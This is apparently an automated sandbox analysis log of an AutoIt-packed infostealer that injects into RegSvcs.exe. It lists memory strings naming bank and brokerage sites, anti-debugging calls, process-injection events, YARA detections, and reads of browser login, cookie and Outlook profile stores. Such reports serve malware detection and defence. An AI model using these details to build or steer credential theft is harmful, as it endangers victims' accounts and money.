                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000007.00000002.4501981731.000000000118E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000003.00000002.4502180233.0000000000C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000003.00000002.4506737704.0000000003CBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: RegSvcs.exe, 00000003.00000002.4506737704.00000000039A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: RegSvcs.exe, 00000007.00000002.4507214361.00000000043A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06339548 LdrInitializeThunk,LdrInitializeThunk,3_2_06339548
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B1EAA2 BlockInput,0_2_00B1EAA2
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC4CE8 mov eax, dword ptr fs:[00000030h]0_2_00AC4CE8
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_017C6FF8 mov eax, dword ptr fs:[00000030h]0_2_017C6FF8
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_017C6F98 mov eax, dword ptr fs:[00000030h]0_2_017C6F98
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_017C5928 mov eax, dword ptr fs:[00000030h]0_2_017C5928
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F84CE8 mov eax, dword ptr fs:[00000030h]2_2_00F84CE8
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_0128E310 mov eax, dword ptr fs:[00000030h]2_2_0128E310
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_0128E370 mov eax, dword ptr fs:[00000030h]2_2_0128E370
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_0128CCA0 mov eax, dword ptr fs:[00000030h]2_2_0128CCA0
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 6_2_01405DD8 mov eax, dword ptr fs:[00000030h]6_2_01405DD8
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 6_2_01404768 mov eax, dword ptr fs:[00000030h]6_2_01404768
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 6_2_01405E38 mov eax, dword ptr fs:[00000030h]6_2_01405E38
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AC083F
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC09D5 SetUnhandledExceptionFilter,0_2_00AC09D5
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AC0C21
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F92622
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F8083F
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F809D5 SetUnhandledExceptionFilter,2_2_00F809D5
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeCode function: 2_2_00F80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00F80C21
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7B3008Jump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: D55008Jump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B01201
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00AE2BA5
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B0B226 SendInput,keybd_event,0_2_00B0B226
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00B222DA
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\oagkiAhXgZ.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe" Jump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00B00B62
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00B01663
                Source: oagkiAhXgZ.exe, reindulgence.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: oagkiAhXgZ.exe, reindulgence.exeBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AC0698 cpuid 0_2_00AC0698
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00B18195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00B18195
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AFD27A GetUserNameW,0_2_00AFD27A
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00ADB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00ADB952
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
                Source: C:\Users\user\Desktop\oagkiAhXgZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5488, type: MEMORYSTR
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.reindulgence.exe.1080000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 768, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4612, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: reindulgence.exe PID: 5316, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: reindulgence.exeBinary or memory string: WIN_81
                Source: reindulgence.exeBinary or memory string: WIN_XP
                Source: reindulgence.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get 